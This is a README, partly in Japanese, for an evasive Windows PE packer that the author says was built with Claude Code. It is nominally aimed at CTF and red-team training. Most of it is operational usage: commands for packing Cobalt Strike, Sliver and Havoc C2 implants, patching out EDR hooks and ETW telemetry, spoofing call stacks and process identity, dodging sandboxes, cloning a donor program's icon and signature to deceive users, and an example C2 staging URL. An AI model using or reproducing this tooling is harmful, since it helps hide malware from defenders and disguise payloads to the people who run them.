
PolyEngine — Updated!
PolyEngineは、CTFチャレンジや低レベルのWindowsセキュリティ教育向けに設計された回避型PEパッカーです。EDRおよびAVのヒューリスティックを、メモリ内実行と難読化技術の層状スタックを通じてバイパスすることに重点を置いています。
PolyEngine — ポリモーフィックPEパッカー 📦
PolyEngine は、CTFチャレンジや低レベルのWindowsセキュリティ教育向けに設計された、研究グレードの回避型PEパッカーです。EDRやAVのヒューリスティックを、メモリ内実行と難読化技術の階層的なスタックを通じてバイパスすることに焦点を当てています。
これは私がしばらく取り組んできたサイドプロジェクトです。Claude Codeを使用して、自分のPEパッカーに実装したいと思っていた技術の一部を実装・修正しました。関数とその機能に関するコメントが多数あります。これは私にとって大きな学習経験であり、Claudeはこれを完璧にこなしてくれます(私は苦手ですが)。誰かがWindowsの内部構造を学んだり、ProLabs 🏯 に取り組む際に、より高度なソリューションからのAVや静的検出を回避するのに役立つことを願っています。
🔥 MalDevAcademy に、作成のためのすべての資料とインスピレーションに対して心から感謝します。
🌩 vx-underground に、馬鹿げた猫の冗談めいたツイートを通じてインスピレーションを与えてくれたことに感謝します。
免責事項: このツールは、許可されたセキュリティテスト、CTF競技、教育目的専用です。明示的な許可なくシステムに対して使用することは禁止されています。作者は誤用に対する一切の責任を負いません。
使用方法
ビルド順序: スタブ→ビルダー。スタブ Release|x64 は stub_v0.bin..stub_v3.bin を生成します。ビルダーはそのうちの1つを .rsrc に埋め込みます。
stub_v0.bin..stub_v3.bin が作業ディレクトリにあることを確認してください(または --stub を渡してください)。```
Builder.exe [OPTIONS]
Target PE (.exe/.dll) or raw shellcode (.bin) Payload type is auto-detected from the MZ header - no flag needed. Output executable
Loader: --stub Loader stub PE [default: random ./stub_v0.bin..stub_v3.bin] --preset PRINT|MEDIA|NETWORK|RANDOM Module stomping DLL preset [default: PRINT] --overload Module overloading instead of stomping (NtCreateSection/NtMapViewOfSection, not in PEB LDR) --keep-alive ExitThread(0) instead of ExitProcess (required for C2 implants that spawn their own threads) --unhook Restore original .text bytes in ntdll/kernel32/ kernelbase from \KnownDlls\ clean copies (overwrites EDR inline hooks before any payload syscall)
Payload (PE/DLL only, silently ignored for shellcode): --export DLL export to invoke after DllMain --arg Argument passed to the export [max 127 chars]
Evasion (all ON by default): --spoof-name Process name for PEB spoof [default: random from pool] Pool: RuntimeBroker.exe SgrmBroker.exe WmiPrvSE.exe SearchIndexer.exe taskhostw.exe spoolsv.exe wlrmdr.exe WMPDMC.exe hvix64.exe --exec-ctrl-name Semaphore name for exec-ctrl check [default: wuauctl] (max 31 chars) --sleep-fwd-ms Sleep duration for sleep-fwd check [default: 500] Detection threshold: 90% of elapsed --uptime-min Uptime threshold for uptime check [default: 2] --hammer-s API-hammer delay duration [default: 3] --disable <token,token...> Disable one or more features (comma-separated, repeatable)
OPSEC tokens: etw EtwEventWrite patch (ETW telemetry suppression) spoofing Call-stack spoofing (SilentMoonwalk RSP pivot) peb PEB path/cmdline spoof tls TLS anti-debug callback (patches loader stub before embedding)
Sandbox/debug check tokens: hammer API-hammer timing delay (VirtualAlloc/Free loop) debugger Debugger detection (PEB flags / NtQueryInformationProcess) api-emu API emulation probe (RtlComputeCrc32 identity check) exec-ctrl Execution-control semaphore (re-execution detection) sleep-fwd Sleep-forwarding detection (timing) uptime System uptime check cpu CPU count check (< 2 logical cores) screen Screen resolution check (<= 1024 px width) files Recent-files count check (< 5 RecentDocs subkeys) all Disable every token listed above
Identity spoofing: --pfx PFX certificate container to sign the output with --pfx-pass PFX passphrase [omit if PFX has no password] --ts-url RFC 3161 timestamp URL [default: no timestamping] OPSEC: timestamping reveals build IP/time to the TSA. Enable only when signing from an isolated VM, or when the signature must survive cert revocation. --clone-meta <donor.exe> Clone VERSIONINFO, icon, and Authenticode cert directory from a donor PE (e.g. notepad.exe, OneDrive.exe). Explorer "Details" tab shows donor company/product/version; file icon matches donor; "Digital Signatures" tab shows donor's signer (HashMismatch — defeats visual inspection only). Name output to match donor OriginalFilename field. When combined with --pfx: real signature overwrites cloned cert. --uac Embed a UAC elevation manifest (requireAdministrator). Output PE prompts for admin privileges on launch. Applied as Phase 10.5 (after packing, before signing).
Examples: Builder.exe implant.exe packed.exe Builder.exe implant.exe packed.exe --stub stub_v2.bin Builder.exe shellcode.bin packed.exe --keep-alive Builder.exe beacon.dll packed.exe --export Start --keep-alive Builder.exe payload.dll packed.exe --export Execute --arg "calc.exe" Builder.exe implant.exe packed.exe --preset NETWORK --disable etw,tls Builder.exe implant.exe packed.exe --overload --hammer-s 5 --uptime-min 5 Builder.exe implant.exe packed.exe --exec-ctrl-name MyMutex --sleep-fwd-ms 1000 Builder.exe implant.exe packed.exe --pfx cert.pfx --pfx-pass hunter2 Builder.exe implant.exe packed.exe --pfx cert.pfx --ts-url http://timestamp.digicert.com Builder.exe implant.exe notepad.exe --clone-meta C:\Windows\System32\notepad.exe Builder.exe implant.exe notepad.exe --clone-meta notepad.exe --pfx self.pfx Builder.exe implant.exe packed.exe --uac Builder.exe implant.exe notepad.exe --uac --clone-meta notepad.exe --pfx self.pfx
## 使用例
シナリオごとにグループ化された使用例。すべてのフラグはオプトアウト(回避はデフォルトで完全に有効)なので、最もシンプルな呼び出しですでにフルスタックが適用されます。
<details>
<summary><b>基本パッキング - EXE / DLL / shellcode</b></summary>
アンマネージドEXEをパックします。ビルダーは自動的に`MZ`ヘッダーを検出し、RunPEパスを経由します:```
Builder.exe implant.exe packed.exe
生の位置独立シェルコード(Cobalt Strike .bin、msfvenom -f raw など)をパックします。MZ は使わず、展開されたバッファに直接呼び出します:```
Builder.exe beacon.bin packed.exe
DLLをパックし、そのデフォルトの`DllMain`のみを呼び出す(エクスポートなし):```
Builder.exe payload.dll packed.exe
デフォルト以外の場所からスタブを使用する:``` Builder.exe implant.exe packed.exe --stub C:\build\release\stub_v1.bin
</details>
<details>
<summary><b>DLLペイロード(エクスポートあり)- Havoc / Sliver / カスタムビーコン</b></summary>
`DllMain` が戻った後、名前付きエクスポートを呼び出します。ほとんどのC2インプラントは、単一のエントリエクスポートを持つDLLとして出荷されます(例:Havoc Demon: `Start`、Sliver: `RunSliver`):```
Builder.exe demon.dll packed.exe --export Start --keep-alive
exportに文字列引数を渡します(最大127文字)。設定文字列、URL、またはシェルコマンドを受け取るペイロードに便利です:``` Builder.exe runner.dll packed.exe --export Execute --arg "https://c2.example.com/stage" Builder.exe loader.dll packed.exe --export Run --arg "C:\Windows\System32\calc.exe"
`--keep-alive`は、独自のスレッドを生成するペイロードに必要です。これがないと、ローダーが`ExitProcess`を呼び出してビーコンを強制終了します。
</details>
<details>
<summary><b>長期実行インプラント(C2ビーコン)</b></summary>
Cobalt Strike / Sliver / Havocはすべてビーコンスレッドを生成して戻ります。ローダースレッドはプロセスを停止させずに終了する必要があります。```
Builder.exe beacon.exe packed.exe --keep-alive
Builder.exe beacon.bin packed.exe --keep-alive
Builder.exe demon.dll packed.exe --export Start --keep-alive